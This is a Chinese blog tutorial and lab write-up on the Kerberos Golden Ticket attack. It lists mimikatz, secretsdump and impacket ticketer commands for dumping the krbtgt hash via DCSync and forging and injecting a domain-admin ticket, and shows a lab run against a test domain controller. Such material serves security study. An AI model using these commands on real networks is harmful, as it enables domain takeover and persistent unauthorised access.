内网渗透--Golden Ticket(黄金票据)制作&利用

已于 2024-01-24 15:40:03 修改
阅读量1k 收藏 28
点赞数 21
分类专栏: 内网渗透 #学习笔记 文章标签: 安全 网络安全
于 2024-01-17 14:35:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62169455/article/details/135231057
版权

一、基础知识

1. 票据原理

伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在域内机器和非域内机器都可以使用

2. 作用

可用于横向移动、权限维持

3. 利用条件

  • 需要知道KDC密钥分发中心账户Krbtgt的hash(最核心,最重要的条件)

krbtgt是域用户,不是域控上的本地用户所以存储不在域控的SAM文件中,而是在ntds文件中

获取krbtgt的hash值,该值的方式有两种:

(1)控制了域控然后查询

使用卷影拷贝技术离线读取或者在线读取

使用secretsdump工具,命令:secretsdump.exe 域名/administrator:密码@IP

QuarksPWDump工具,命令:QuarksPWDump.exe --dump-hash-domain --ntds-file ntds.dit(Ntds这个文件必须先要导出)

mimikatz工具,命令:lsadump::dcsync /domian:域名 /user:krbtgt

(2)通过dsync查询 milikatz->lsadump::dcsync /domian:域名 /user:krbtgt

注:dcsync技术必须有administrator组内用户、Domain Admins组内用户、Enterprise Admins组内用户、域控制器的计算机账户以及域控的Administrator和system的支持

  • 需要知道域名   

命令:system

  • 需要知道SID值  

获取SID值,命令:whoami /all

  • 伪造的用户(一般都是管理员权限)

二、制作&使用

1. impacket中的工具ticketer(该工具是本地生成的)

命令:ticketer -domain-sid sid值 -nthash krbtgt-hash -domain 域名 伪造的用户

2. mimikatz直接生成然后导入到内存中

命令:Kerberos::golden /user:administrator /domain:域名 /sid:SID值 /krbtgt:NTLM-HASH /ptt(后面如果携带ptt就会自动注入到内存,如果不携带就会在本地生成)

三、实验操作

1. 信息收集

域控:win server 2012 R2   

域内机:Win 7

根据上面所讲述的,这里制作黄金票据需要先收集有SID值、krbtgt的hash值以及域名

获取SID值:

获取域名

 获取krbtgt的hash值

2. 生成票据&利用

前期我们已经拿到制作票据需要的信息,然后换到一台普通的域内机器,这里我直接使用mimikatz来生成票据:

Kerberos::golden /user:administrator /domain:xiaodi.local /sid:S-1-5-21-1695257952-3088263962-2055235443 /krbtgt:558ae7f88589153355cbeb046ac696df /ptt

然后使用命令klist,可以查看生成的票据

3. 访问测试

这时候黄金票据已经成功生成,直接去访问域控的c盘,验证一下

成功访问域控 

本文所涉及到的工具,关注公众号【404攻防实验室】,回复666,即可得到本文实验工具

香芋味儿的霜
关注
  • 21
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
黄金票据制作原理及利用方式
Happy峰
09-23 1968
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 2048
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
[内网渗透]—票据传递
Sentiment的博客
12-08 625
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
渗透测试之内网渗透学习
2201_75571291的博客
06-22 1777
渗透测试之内网渗透学习
黄金票据原理制作利用
G3et的博客
01-14 505
1、用域管理运行mimikatz抓取完所需的东西 ==> 再到域用户机器上运行伪造票据。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据在使用的过程需要和域控通信****加粗样式。
ISC-内网渗透 -最终版.pdf
最新发布
04-08
ISC-内网渗透 -最终版
内网渗透测试-外链.pdf
05-04
内网渗透测试-外链.pdf
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
1.2、端口连接 1.3、配置文件 1.4、用户信息 1.5、内网主机发现 1.6、会话收集 1.7、凭据收集 1.9、域信任 1.10、域传送 1.11、DN
内网渗透综合实验 - 实验指导书
10-23
内网渗透综合实验 - 实验指导书,通过实验学习内网渗透的细节,掌握内网攻防的具体步骤,可以进行实战操作
内网渗透--黄金票据
yc的博客
05-23 1708
域渗透-----黄金票据的使用 前言 今天主要学习内容为黄金票据制作黄金票据主要是权限维持,因为经验少,所以一直不明白一个问题,就是在制作黄金票据时候需要KRBTGT的hash,KRBTGT的hash需要域控权限,而且每张黄金票据制作后仅可维持十个小时,那么黄金票据的主要作用是什么?是hw时管理员突然改域控密码,此时黄金票据可以维持权限、继续渗透嘛? Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用于向域控制器上的KD
内网渗透黄金白银票据(Kerberos认证)简介
weixin_53958661的博客
12-28 1325
图解: Kerberos认证一共分为三个阶段: Kerberos认证一共分为三个阶段 AS-REQ---AS-REP阶段:(Client和AS的认证) 1.首先Client(客户端)用自己的哈希值(NTLM-hash)对(时间戳,客,服)等数据加密后,发送给AS(身份验证服务)向AS请求TGT票据。 -----AS-REQ---- 2.当AS收到Client发来的数据后,AS会向AD(域控)发起请求,询问是否有该client用户,如果有的话就取出client的...
内网渗透:三、Kerberos协议及票据黄金和白银)伪造
liu_jia_liang的博客
02-20 3293
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
黄金票据制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
kerberos 票据_域渗透之黄金票据的实际利用
weixin_39861905的博客
12-25 463
先介绍下Kerberos协议:Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。在Kerberos协议中主要是有三个角色的存在:1:访问服务的Client(用户的机器客户端)2:提供服务的Server(服务端)3:KDC(Key Distribution Center)密钥分发中心其中KDC服务默认会安装在一...
域渗透之(黄金票据利用
cj_Hydra's Blog
02-13 2786
前言: 这里先介绍下Kerberos协议: Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。 在Kerberos协议中主要是有三个角色的存在: 1:访问服务的Client(用户的机器客户端) 2:提供服务的Server(服务端) 3:KDC(Key Distribution Center)密钥分发中心其中K...
域渗透-白银票据黄金票据利用
orange777
02-23 3707
最近做了一些靶场域渗透的实验,记录下一些关于白银票据黄金票据的问题。 0x01 白银票据利用 1 环境信息 域控DC 192.168.183.130 域内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的域成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的域用户有域管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@域
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1090
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
域渗透之黄金票据大法 本地实验
broing55的博客
04-03 1280
黄金票据大法 图示: 黄金票据 ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 黄金票据的条件要求: 1.域名称 hacker.com 2.域的SID 值 S-1-5-21-1854149318-4101476522-18457...
vb制作打印票据程序
09-19
VB是一种流行的编程语言,可以用来制作打印票据程序。下面是一个简单的示例程序: 1. 首先,需要创建一个新的VB项目。打开Visual Studio,选择新建项目,选择Visual Basic,然后选择Windows桌面应用程序。 2. 在新建的项目中,打开窗体设计器。在窗体上添加所需的控件,例如按钮、文本框和标签。 3. 在窗体的代码视图中,编写代码来处理打印操作。首先,需要导入命名空间PrintDocument和PrintPreviewDialog。然后,创建一个PrintDocument和PrintPreviewDialog的实例。 4. 在按钮的点击事件中,添加代码以设置打印操作的设置,例如页面大小和边距。可以使用PrintDocument的PrinterSettings属性来实现。 5. 接下来,可以使用PrintDocument的PrintPage事件来定义打印内容和样式。可以使用Graphics对象提供的方法和属性来绘制文本、图像和其他元素。 6. 最后,可以使用PrintPreviewDialog的ShowDialog方法来显示打印预览对话框,并使用PrintDocument的Print方法来实际执行打印操作。 通过以上步骤,就可以创建一个简单的打印票据程序。当用户点击按钮时,程序将显示打印预览对话框,并在打印时根据所定义的设置和内容打印票据。 当然,这只是一个简单的示例程序,实际中可能会有更复杂的需求,例如打印多页票据、添加页眉和页脚等。但是,使用VB编程非常灵活,可以根据具体需求进行扩展和修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值